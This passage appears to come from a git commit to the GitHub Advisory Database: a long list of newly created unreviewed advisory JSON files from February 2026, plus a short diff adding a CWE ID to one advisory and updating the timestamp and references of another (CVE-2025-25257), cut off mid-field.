advisories/unreviewed/2026/02/GHSA-3r56-xx7r-cr9c/GHSA-3r56-xx7r-cr9c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3rcg-gg9q-9688/GHSA-3rcg-gg9q-9688.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3rhf-g27v-qpj7/GHSA-3rhf-g27v-qpj7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3vr9-ghwq-fh8h/GHSA-3vr9-ghwq-fh8h.json create mode 100644 advisories/unreviewed/2026/02/GHSA-42h9-mr3g-6gc2/GHSA-42h9-mr3g-6gc2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-42qj-j5qx-4j25/GHSA-42qj-j5qx-4j25.json create mode 100644 advisories/unreviewed/2026/02/GHSA-42vx-f9wx-wg3r/GHSA-42vx-f9wx-wg3r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-43rm-rg7w-7rjf/GHSA-43rm-rg7w-7rjf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-43ww-vg8r-97hv/GHSA-43ww-vg8r-97hv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-46ph-2qpx-729g/GHSA-46ph-2qpx-729g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-47ph-88gx-hg42/GHSA-47ph-88gx-hg42.json create mode 100644 advisories/unreviewed/2026/02/GHSA-48pc-4fq3-jhwg/GHSA-48pc-4fq3-jhwg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4f62-jjjx-4hrr/GHSA-4f62-jjjx-4hrr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4fcf-69p7-63vf/GHSA-4fcf-69p7-63vf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4ff7-6hm2-x86r/GHSA-4ff7-6hm2-x86r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4fwr-9c58-jg7x/GHSA-4fwr-9c58-jg7x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4ggr-f4xw-9446/GHSA-4ggr-f4xw-9446.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4gvf-3g6g-c2mg/GHSA-4gvf-3g6g-c2mg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4pmf-68jr-9pq2/GHSA-4pmf-68jr-9pq2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4pmr-jmj5-4gwv/GHSA-4pmr-jmj5-4gwv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4qvw-ghv2-2gg4/GHSA-4qvw-ghv2-2gg4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4r8w-crc8-mqph/GHSA-4r8w-crc8-mqph.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4wc7-crf4-r645/GHSA-4wc7-crf4-r645.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5284-5qqc-v2w8/GHSA-5284-5qqc-v2w8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-536p-mw62-6cm4/GHSA-536p-mw62-6cm4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-53q4-966f-vpp2/GHSA-53q4-966f-vpp2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-56wx-rr26-54fr/GHSA-56wx-rr26-54fr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-57gh-h62q-5fwp/GHSA-57gh-h62q-5fwp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-57vf-72qj-2828/GHSA-57vf-72qj-2828.json create mode 100644 advisories/unreviewed/2026/02/GHSA-58h5-w6gx-q297/GHSA-58h5-w6gx-q297.json create mode 100644 advisories/unreviewed/2026/02/GHSA-58p5-8f5p-8qqg/GHSA-58p5-8f5p-8qqg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-58qh-jxh9-rvp5/GHSA-58qh-jxh9-rvp5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5h9r-fr4c-2vwr/GHSA-5h9r-fr4c-2vwr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5j3p-mg5x-539j/GHSA-5j3p-mg5x-539j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5ppr-f7g3-89cw/GHSA-5ppr-f7g3-89cw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5w67-c6pv-hmpq/GHSA-5w67-c6pv-hmpq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5xcj-44v8-p2v3/GHSA-5xcj-44v8-p2v3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5xr7-h2jm-xhr2/GHSA-5xr7-h2jm-xhr2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6262-6vhm-9x8v/GHSA-6262-6vhm-9x8v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-62hw-x3qq-c7vv/GHSA-62hw-x3qq-c7vv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-62jc-vj7m-2q9x/GHSA-62jc-vj7m-2q9x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-62mp-mc96-vv2w/GHSA-62mp-mc96-vv2w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-63pr-8qvw-vfv9/GHSA-63pr-8qvw-vfv9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-63v8-38hf-jrfm/GHSA-63v8-38hf-jrfm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6562-26mh-56xr/GHSA-6562-26mh-56xr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-66q7-4wcm-7r85/GHSA-66q7-4wcm-7r85.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6frj-85f5-897h/GHSA-6frj-85f5-897h.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6fwh-vwxr-5jrw/GHSA-6fwh-vwxr-5jrw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6g49-x6hq-6rmq/GHSA-6g49-x6hq-6rmq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6qvx-865f-qrhf/GHSA-6qvx-865f-qrhf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6rr6-99p5-684x/GHSA-6rr6-99p5-684x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6v87-78cw-pw29/GHSA-6v87-78cw-pw29.json create mode 100644 advisories/unreviewed/2026/02/GHSA-733c-qhrf-7cmm/GHSA-733c-qhrf-7cmm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-752x-86hx-w73c/GHSA-752x-86hx-w73c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7689-4fm5-8xxm/GHSA-7689-4fm5-8xxm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-76g3-wv5g-g883/GHSA-76g3-wv5g-g883.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7cjr-h9q5-mgrf/GHSA-7cjr-h9q5-mgrf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7f73-hx35-rw45/GHSA-7f73-hx35-rw45.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7gx4-4vpm-w576/GHSA-7gx4-4vpm-w576.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7qvf-m2xc-hg57/GHSA-7qvf-m2xc-hg57.json create mode 100644 advisories/unreviewed/2026/02/GHSA-82j5-hm8j-jwhq/GHSA-82j5-hm8j-jwhq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-877x-j2fm-2mw5/GHSA-877x-j2fm-2mw5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-87jc-9r3r-58w8/GHSA-87jc-9r3r-58w8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8c32-hp76-8f35/GHSA-8c32-hp76-8f35.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8f2p-qrq8-3vpg/GHSA-8f2p-qrq8-3vpg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8m92-8r47-wxqw/GHSA-8m92-8r47-wxqw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8p6j-8fq8-23rr/GHSA-8p6j-8fq8-23rr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8p85-wjp4-3w4m/GHSA-8p85-wjp4-3w4m.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8x43-j6j7-q6vg/GHSA-8x43-j6j7-q6vg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-97g7-x3h6-6ccc/GHSA-97g7-x3h6-6ccc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-97hf-p3f7-pjq2/GHSA-97hf-p3f7-pjq2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-988g-r4v6-j68v/GHSA-988g-r4v6-j68v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9crc-72v8-4jmj/GHSA-9crc-72v8-4jmj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9jmq-xgjm-p8c2/GHSA-9jmq-xgjm-p8c2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9mr9-pcmg-4xr7/GHSA-9mr9-pcmg-4xr7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9vr5-8j2w-55f6/GHSA-9vr5-8j2w-55f6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9w4h-qf26-hvrv/GHSA-9w4h-qf26-hvrv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-c27m-jc6r-9c95/GHSA-c27m-jc6r-9c95.json create mode 100644 advisories/unreviewed/2026/02/GHSA-c29h-3pp8-76hf/GHSA-c29h-3pp8-76hf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-c49j-5m2h-224g/GHSA-c49j-5m2h-224g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-c4qg-fgx5-7xg5/GHSA-c4qg-fgx5-7xg5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-c88w-mqr9-prrr/GHSA-c88w-mqr9-prrr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cf7g-cxh2-5vhr/GHSA-cf7g-cxh2-5vhr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cg8f-pcpw-6836/GHSA-cg8f-pcpw-6836.json create mode 100644 advisories/unreviewed/2026/02/GHSA-chqg-r72f-gcgr/GHSA-chqg-r72f-gcgr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cjp5-2c5h-3735/GHSA-cjp5-2c5h-3735.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cm5v-8jg4-g44j/GHSA-cm5v-8jg4-g44j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cq45-jm56-f2cg/GHSA-cq45-jm56-f2cg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-crh6-h7h3-f48v/GHSA-crh6-h7h3-f48v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cvjq-fp7r-7jf7/GHSA-cvjq-fp7r-7jf7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cvm5-m63f-8wmv/GHSA-cvm5-m63f-8wmv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f29p-m33v-73cj/GHSA-f29p-m33v-73cj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f3xp-j3c9-999x/GHSA-f3xp-j3c9-999x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f6p8-2gf3-784r/GHSA-f6p8-2gf3-784r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f6pr-2mv6-45fq/GHSA-f6pr-2mv6-45fq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f8c9-f59w-g5cx/GHSA-f8c9-f59w-g5cx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fc39-6hhj-gr5p/GHSA-fc39-6hhj-gr5p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fg97-672q-6chv/GHSA-fg97-672q-6chv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fqrw-hvqv-r58w/GHSA-fqrw-hvqv-r58w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-g3qj-5j85-8w2c/GHSA-g3qj-5j85-8w2c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-g5wr-mqvx-5c3v/GHSA-g5wr-mqvx-5c3v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gcfc-fjf7-2pj9/GHSA-gcfc-fjf7-2pj9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gfrr-w669-mfpw/GHSA-gfrr-w669-mfpw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gj5f-4c2g-54hq/GHSA-gj5f-4c2g-54hq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gmmc-3vpq-7m4c/GHSA-gmmc-3vpq-7m4c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gpx9-88hq-9x47/GHSA-gpx9-88hq-9x47.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gv3f-578r-jhf3/GHSA-gv3f-578r-jhf3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gv8w-m9x9-cvqj/GHSA-gv8w-m9x9-cvqj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gvgc-7vpx-c4jp/GHSA-gvgc-7vpx-c4jp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gxg3-7vjc-h392/GHSA-gxg3-7vjc-h392.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h886-6wvm-63qx/GHSA-h886-6wvm-63qx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h8g5-mfv5-4rp9/GHSA-h8g5-mfv5-4rp9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h8h3-mqvc-hwrf/GHSA-h8h3-mqvc-hwrf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h93r-xq5m-hv3w/GHSA-h93r-xq5m-hv3w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h94h-v9gq-74g7/GHSA-h94h-v9gq-74g7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hc23-qvrh-v59g/GHSA-hc23-qvrh-v59g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hc97-m5vw-hgpf/GHSA-hc97-m5vw-hgpf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hx9h-rh37-jg32/GHSA-hx9h-rh37-jg32.json create mode 100644 advisories/unreviewed/2026/02/GHSA-j368-q2mr-vhv4/GHSA-j368-q2mr-vhv4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-j3pj-q5qg-g2r8/GHSA-j3pj-q5qg-g2r8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-j4g8-p5xf-cx8j/GHSA-j4g8-p5xf-cx8j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-j69g-gh5p-j2j3/GHSA-j69g-gh5p-j2j3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jcgh-3xqc-4hgp/GHSA-jcgh-3xqc-4hgp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jf9p-r93v-rw24/GHSA-jf9p-r93v-rw24.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jhr5-g8vv-6x3q/GHSA-jhr5-g8vv-6x3q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jjpv-2mhh-mcmm/GHSA-jjpv-2mhh-mcmm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jvrv-rj6m-mfm6/GHSA-jvrv-rj6m-mfm6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jw2x-9qxr-2w9w/GHSA-jw2x-9qxr-2w9w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jxq5-ggfq-q36w/GHSA-jxq5-ggfq-q36w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m23x-mm6q-4qg4/GHSA-m23x-mm6q-4qg4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m69x-7wp8-6gjv/GHSA-m69x-7wp8-6gjv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m78j-wv7w-r94w/GHSA-m78j-wv7w-r94w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mgwj-pxgv-5r8r/GHSA-mgwj-pxgv-5r8r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mhqr-8rx2-jw82/GHSA-mhqr-8rx2-jw82.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mhvh-7hfw-2pcj/GHSA-mhvh-7hfw-2pcj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mj24-8cx9-5wc8/GHSA-mj24-8cx9-5wc8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mj7j-8qcf-454p/GHSA-mj7j-8qcf-454p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mj9g-3f37-7qv2/GHSA-mj9g-3f37-7qv2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mq7f-f783-pc94/GHSA-mq7f-f783-pc94.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mqj4-m7cg-hx46/GHSA-mqj4-m7cg-hx46.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mrcv-7mr4-vfm5/GHSA-mrcv-7mr4-vfm5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mrp6-8q86-qp29/GHSA-mrp6-8q86-qp29.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mvfm-p427-8c26/GHSA-mvfm-p427-8c26.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mvmh-gv2w-6hrm/GHSA-mvmh-gv2w-6hrm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mvp7-2m2r-2548/GHSA-mvp7-2m2r-2548.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mwrf-hg69-6h5g/GHSA-mwrf-hg69-6h5g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p2m5-3j38-g6mj/GHSA-p2m5-3j38-g6mj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p2vq-xhgq-wqqr/GHSA-p2vq-xhgq-wqqr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p3w5-jrj2-m9r6/GHSA-p3w5-jrj2-m9r6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p52x-wxj2-j8jr/GHSA-p52x-wxj2-j8jr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p57f-h2f5-67v8/GHSA-p57f-h2f5-67v8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p69v-gqh4-hg9p/GHSA-p69v-gqh4-hg9p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p95v-rww3-j83p/GHSA-p95v-rww3-j83p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pf6r-4hv7-pr4f/GHSA-pf6r-4hv7-pr4f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pfgm-6983-f589/GHSA-pfgm-6983-f589.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pg4q-7rh5-52c9/GHSA-pg4q-7rh5-52c9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pj5w-7j3v-9wwv/GHSA-pj5w-7j3v-9wwv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pjx3-8fqj-x6hr/GHSA-pjx3-8fqj-x6hr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pm2j-978g-6g85/GHSA-pm2j-978g-6g85.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pm69-54qr-cgv7/GHSA-pm69-54qr-cgv7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pmgj-wpmq-6xx5/GHSA-pmgj-wpmq-6xx5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pq2q-m7vr-7342/GHSA-pq2q-m7vr-7342.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pq9c-2qch-jgmw/GHSA-pq9c-2qch-jgmw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-prpx-gw6q-vpv2/GHSA-prpx-gw6q-vpv2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pw6c-r98f-r37w/GHSA-pw6c-r98f-r37w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pxxq-rvgm-p9rp/GHSA-pxxq-rvgm-p9rp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q2ch-643m-222m/GHSA-q2ch-643m-222m.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q577-6r28-hw22/GHSA-q577-6r28-hw22.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q682-57gm-p99w/GHSA-q682-57gm-p99w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q6xg-x4rx-4p97/GHSA-q6xg-x4rx-4p97.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q8wg-gw6g-8c93/GHSA-q8wg-gw6g-8c93.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qq6w-x794-mfrc/GHSA-qq6w-x794-mfrc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qqj5-wp73-78fr/GHSA-qqj5-wp73-78fr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qv9f-wvw4-25rj/GHSA-qv9f-wvw4-25rj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qvpj-hxx2-jj7g/GHSA-qvpj-hxx2-jj7g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qx85-r5h6-jm6f/GHSA-qx85-r5h6-jm6f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r5c8-59gv-v4x8/GHSA-r5c8-59gv-v4x8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r8fr-76pj-5h7j/GHSA-r8fr-76pj-5h7j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rfpg-r65c-g86m/GHSA-rfpg-r65c-g86m.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rhvr-p49q-rhmm/GHSA-rhvr-p49q-rhmm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rjh6-2p75-696h/GHSA-rjh6-2p75-696h.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rm7g-73m3-759p/GHSA-rm7g-73m3-759p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rmj8-x3h3-24rh/GHSA-rmj8-x3h3-24rh.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rp93-gq4p-8r62/GHSA-rp93-gq4p-8r62.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rr5c-93pp-mqfv/GHSA-rr5c-93pp-mqfv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rr5p-xfmq-r2vx/GHSA-rr5p-xfmq-r2vx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rrpc-76pm-5w54/GHSA-rrpc-76pm-5w54.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rv4c-25xc-4f6g/GHSA-rv4c-25xc-4f6g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rvcv-xmp5-qv44/GHSA-rvcv-xmp5-qv44.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rw2x-9m7j-wvrx/GHSA-rw2x-9m7j-wvrx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rw5q-r997-qm48/GHSA-rw5q-r997-qm48.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rxjp-cgw5-jfcg/GHSA-rxjp-cgw5-jfcg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v36c-x4c4-8wx6/GHSA-v36c-x4c4-8wx6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v534-r4rj-rcvf/GHSA-v534-r4rj-rcvf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v5q2-22j2-xvp3/GHSA-v5q2-22j2-xvp3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v6m3-2f65-r5x7/GHSA-v6m3-2f65-r5x7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v6x7-wpp7-g26g/GHSA-v6x7-wpp7-g26g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v754-wvf3-33xx/GHSA-v754-wvf3-33xx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v76h-ch32-xfcr/GHSA-v76h-ch32-xfcr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v859-79r4-4vv5/GHSA-v859-79r4-4vv5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v9wq-4qj2-xvh4/GHSA-v9wq-4qj2-xvh4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vf3m-rggr-vh64/GHSA-vf3m-rggr-vh64.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vg7x-9fx9-rhfv/GHSA-vg7x-9fx9-rhfv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vhgp-3x24-vh98/GHSA-vhgp-3x24-vh98.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vjvc-9fxm-2xw8/GHSA-vjvc-9fxm-2xw8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vmwq-q997-3c46/GHSA-vmwq-q997-3c46.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vp2m-r3pp-p859/GHSA-vp2m-r3pp-p859.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vph5-6p6f-8xpf/GHSA-vph5-6p6f-8xpf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vxf7-pjj6-wh93/GHSA-vxf7-pjj6-wh93.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w246-2vcp-75v8/GHSA-w246-2vcp-75v8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w2hw-vq92-cm3x/GHSA-w2hw-vq92-cm3x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w7wv-fvvq-ppfp/GHSA-w7wv-fvvq-ppfp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wf36-8q2p-m2xg/GHSA-wf36-8q2p-m2xg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wfqx-2rhq-j78p/GHSA-wfqx-2rhq-j78p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wfqx-gw86-rc8h/GHSA-wfqx-gw86-rc8h.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wg3c-3523-f9fc/GHSA-wg3c-3523-f9fc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wgg5-6gv9-fvpp/GHSA-wgg5-6gv9-fvpp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wm24-gwfw-426w/GHSA-wm24-gwfw-426w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wm24-v2x8-m9pj/GHSA-wm24-v2x8-m9pj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wqcv-67x3-mx26/GHSA-wqcv-67x3-mx26.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wqpx-frj2-7xmj/GHSA-wqpx-frj2-7xmj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wrqv-46c5-q67w/GHSA-wrqv-46c5-q67w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wv4q-94jw-h996/GHSA-wv4q-94jw-h996.json create mode 100644 advisories/unreviewed/2026/02/GHSA-ww4h-gqqf-68h9/GHSA-ww4h-gqqf-68h9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wxg7-qr4v-6w49/GHSA-wxg7-qr4v-6w49.json create mode 100644 advisories/unreviewed/2026/02/GHSA-x25m-mgjq-j9gg/GHSA-x25m-mgjq-j9gg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-x57h-c6qr-3m4q/GHSA-x57h-c6qr-3m4q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-x6m2-4qvv-ghf6/GHSA-x6m2-4qvv-ghf6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xcg8-79j4-g746/GHSA-xcg8-79j4-g746.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xcv9-r62w-jh9r/GHSA-xcv9-r62w-jh9r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xf4f-qj26-72pf/GHSA-xf4f-qj26-72pf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xfxx-38qx-mrf4/GHSA-xfxx-38qx-mrf4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xg7c-7v8p-8ww8/GHSA-xg7c-7v8p-8ww8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xgmj-j94q-46cv/GHSA-xgmj-j94q-46cv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xq4j-x39q-xhqm/GHSA-xq4j-x39q-xhqm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xrpj-w92h-g66g/GHSA-xrpj-w92h-g66g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xv8f-556c-h484/GHSA-xv8f-556c-h484.json diff --git a/advisories/unreviewed/2025/06/GHSA-h2w9-p5qf-qmrh/GHSA-h2w9-p5qf-qmrh.json b/advisories/unreviewed/2025/06/GHSA-h2w9-p5qf-qmrh/GHSA-h2w9-p5qf-qmrh.json index b7c2fdc3a1409..5739901dcf42b 100644 --- a/advisories/unreviewed/2025/06/GHSA-h2w9-p5qf-qmrh/GHSA-h2w9-p5qf-qmrh.json +++ b/advisories/unreviewed/2025/06/GHSA-h2w9-p5qf-qmrh/GHSA-h2w9-p5qf-qmrh.json @@ -30,6 +30,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-74", "CWE-77" ], "severity": "CRITICAL", diff --git a/advisories/unreviewed/2025/07/GHSA-mj4r-rpwm-gg33/GHSA-mj4r-rpwm-gg33.json b/advisories/unreviewed/2025/07/GHSA-mj4r-rpwm-gg33/GHSA-mj4r-rpwm-gg33.json index 0cfe119e9f720..ecdd2a1407a28 100644 --- a/advisories/unreviewed/2025/07/GHSA-mj4r-rpwm-gg33/GHSA-mj4r-rpwm-gg33.json +++ b/advisories/unreviewed/2025/07/GHSA-mj4r-rpwm-gg33/GHSA-mj4r-rpwm-gg33.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mj4r-rpwm-gg33", - "modified": "2025-10-22T00:33:19Z", + "modified": "2026-02-20T18:31:24Z", "published": "2025-07-17T18:31:13Z", "aliases": [ "CVE-2025-25257" @@ -27,9 +27,17 @@ "type": "WEB", "url": 